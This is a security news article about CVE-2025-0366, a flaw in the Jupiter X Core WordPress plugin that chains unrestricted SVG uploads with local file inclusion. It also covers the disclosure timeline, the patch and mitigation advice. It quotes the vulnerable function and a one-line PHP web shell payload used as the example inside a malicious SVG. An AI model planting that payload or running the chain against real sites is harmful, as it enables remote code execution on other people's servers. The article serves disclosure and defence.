A critical vulnerability (CVE-2025-0366) in the Jupiter X Core WordPress plugin, actively installed on over 90,000 websites, was disclosed on January 6, 2025.
The flaw enables authenticated attackers with contributor-level privileges to execute remote code via chained Local File Inclusion (LFI) and malicious SVG uploads.
Discovered by researcher stealthcopter through the Wordfence Bug Bounty Program, the vulnerability earned a $782 bounty and underscores persistent risks in plugin-dependent ecosystems.
Vulnerability Overview
CVE-2025-0366: Technical Breakdown
The vulnerability chain involves two critical flaws in the plugin’s file handling logic:
1. Unrestricted SVG Uploads
The plugin’s Ajax_Handler class allowed contributors to upload SVG files without validating content.
While filenames were randomized using PHP’s uniqid() function, researchers noted this method relies on server microtime – a predictable value if an attacker knows the upload timestamp.
2. Local File Inclusion via get_svg()
The get_svg() method in the plugin’s Utils class improperly sanitized user input when including SVG files:
public static function get_svg($file_name = '') {
   return Plugin::$plugin_path . 'assets/img/' . $file_name . '.svg';
}By manipulating the $file_name parameter, attackers could traverse directories and include arbitrary files, including PHP files containing malicious payloads.
Successful exploitation requires an attacker to upload a malicious SVG (e.g., embedding <?php system($_GET[“cmd”]); ?>), predict the randomized filename, and trigger inclusion via the plugin’s video widget.
While contributor-level access limits immediate risk, authenticated attackers could escalate privileges, exfiltrate data, or deploy malware.
The CVSS score of 8.8 (High) reflects the severe impact on confidentiality, integrity, and availability.
Wordfence released firewall rules to Premium users on January 13, 2025, with free users receiving protection on February 12.
Developer Artbees patched the issue in version 4.8.8 on January 29, implementing SHA-256 filename hashing and strict file allowlisting. Users are urged to update immediately and audit contributor permissions.
This incident highlights systemic challenges in WordPress plugin security, where 60% of vulnerabilities originate from third-party extensions.
SVG files, often treated as static images, pose unique risks due to their XML-based structure, which can embed scripts or PHP payloads.
Wordfence’s Bug Bounty Program, resolving 1,200+ vulnerabilities since 2022, demonstrates the value of ethical disclosure in mitigating such threats.
Security experts advise adopting machine learning-based file validation to detect anomalous content in SVGs and enforcing zero-trust policies for file uploads.
Regular code audits for path traversal flaws and least-privilege access models remain critical for mitigating similar risks.
For real-time alerts, administrators are encouraged to subscribe to threat intelligence feeds like Wordfence Intelligence.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting - Register Here
 in the Jupiter X Core WordPress plugin, actively installed on over 90,000 websites.){kind=link}